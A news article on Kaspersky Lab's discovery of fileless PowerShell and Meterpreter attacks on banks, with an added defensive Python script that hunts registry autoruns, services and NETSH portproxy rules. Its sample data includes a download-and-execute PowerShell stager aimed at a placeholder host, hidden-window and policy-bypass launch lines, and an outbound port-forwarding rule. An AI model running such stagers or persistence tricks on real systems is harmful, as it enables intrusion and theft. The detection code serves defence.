Kaspersky Lab researchers have brought to light a series of attacks leveraged against 140+ banks and other businesses around the world.
But what makes these attacks unusual is the criminals’ use of widely used legitimate tools and fileless malware, which explains why the attacks went largely unnoticed.
“This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC),” the researchers explained.
“Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally, it was discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker’s C2.”
Meterpreter is a well-known Metasploit payload that allows attackers to control the screen of a device using VNC and to browse, upload and download files. NETSH (network shell) is a Windows command-line utility that allows local or remote configuration of network devices.
The attackers also took advantage of the Windows SC utility to install a malicious service to execute PowerShell scripts, and Mimikatz to extract credentials from compromised machines.
“The use of the SC and NETSH utilities requires administrator privileges both in local and remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes,” the researchers noted.
“In order to achieve this, attackers used credentials from Service accounts with administrative privileges (for example backup, service for remote task scheduler, etc.) grabbed by Mimikatz.”
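The three host-side artefacts the researchers describe (PowerShell launchers stored in registry autorun values, services whose binary path invokes PowerShell, and NETSH port-forwarding rules that tunnel traffic out of the host) are all visible to a defender who knows where to look. The script below is an added example written for this article, not code from Kaspersky Lab; it runs over constructed sample data standing in for a host collector's output (registry Run values, service image paths, and the table printed by `netsh interface portproxy show v4tov4`), decodes any `-EncodedCommand` payload it finds, and flags portproxy rules that forward to addresses outside an assumed set of internal ranges. The placeholder host name, the stager string and the internal ranges are assumptions.

```python
import base64
import ipaddress
import re

# Constructed sample artifacts (not taken from the Kaspersky report) standing in
# for what a collector would pull from a host. The stager text and the host name
# are placeholders, not real indicators.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode()

# (location, name, command line) triples: registry autoruns and service image paths.
SAMPLE_AUTORUNS = [
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell.exe -NoP -W Hidden -Enc " + ENCODED_STAGER),
]
SAMPLE_SERVICES = [
    ("services", "Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("services", "SvcHelper",
     r"cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\h.ps1"),
]
# Output shape of `netsh interface portproxy show v4tov4` (constructed).
SAMPLE_PORTPROXY = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4444        203.0.113.10    443
"""

POWERSHELL_RE = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# Abbreviations PowerShell accepts for -EncodedCommand, followed by the base64 blob.
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Switches rarely seen in legitimate unattended administration.
EVASION_RE = re.compile(
    r"-(?:nop\b|noprofile\b|w(?:indowstyle)?\s+hidden\b|(?:ep|ex|exec|executionpolicy)\s+bypass\b)",
    re.I)
# Assumed internal address space; anything else is treated as an external destination.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 over UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_powershell(cmdline):
    """List the reasons a command line looks like a fileless PowerShell launcher,
    or return None if it does not invoke PowerShell at all."""
    if not POWERSHELL_RE.search(cmdline):
        return None
    reasons = [m.group(0) for m in EVASION_RE.finditer(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded)
    return reasons or ["powershell invoked"]


def hunt_launchers(entries):
    """entries: iterable of (location, name, command). Returns the flagged ones."""
    findings = []
    for location, name, command in entries:
        reasons = assess_powershell(command)
        if reasons:
            findings.append({"location": location, "name": name, "reasons": reasons})
    return findings


def parse_portproxy(text):
    """Parse the v4tov4 table into (listen_addr, listen_port, connect_addr, connect_port)."""
    rules = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[1].isdigit() and parts[3].isdigit():
            rules.append((parts[0], int(parts[1]), parts[2], int(parts[3])))
    return rules


def hunt_portproxy(text):
    """Every portproxy rule on a workstation or DC deserves a look; rules that
    forward to an address outside INTERNAL_NETS are marked external. A hostname
    target cannot be judged without resolving it, so it is marked None."""
    findings = []
    for laddr, lport, caddr, cport in parse_portproxy(text):
        try:
            external = not any(ipaddress.ip_address(caddr) in n for n in INTERNAL_NETS)
        except ValueError:
            external = None
        findings.append({"listen": f"{laddr}:{lport}",
                         "connect": f"{caddr}:{cport}", "external": external})
    return findings


if __name__ == "__main__":
    for f in hunt_launchers(SAMPLE_AUTORUNS) + hunt_launchers(SAMPLE_SERVICES):
        print("LAUNCHER ", f)
    for f in hunt_portproxy(SAMPLE_PORTPROXY):
        print("PORTPROXY", f)
```

On a real fleet the sample lists would be replaced by data pulled from the hosts (for example the Run keys, the `ImagePath` values under the services key, and the portproxy table), and the decoded payload is what an analyst would pivot on, since the base64 blob itself changes with every stager while the decoded command is what the attacker actually runs.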
The attackers’ goal
The attacks on banks were apparently aimed at compromising computers that control ATMs, so the attackers could steal money.
But the use of the Metasploit framework, standard Windows utilities and previously unknown domains that have no WHOIS information makes it difficult to tie these attacks to one or more groups.
Also, it is still unknown how the initial infection is performed.
What to do?
The researchers are scheduled to reveal more details about the attacks in April.
In the meantime, they have published Indicators of Compromise (IoCs) and a Yara rule that can be used by banks and organizations to detect these fileless PowerShell attacks on their networks.
“After successful disinfection and cleaning, it is necessary to change all passwords,” they concluded.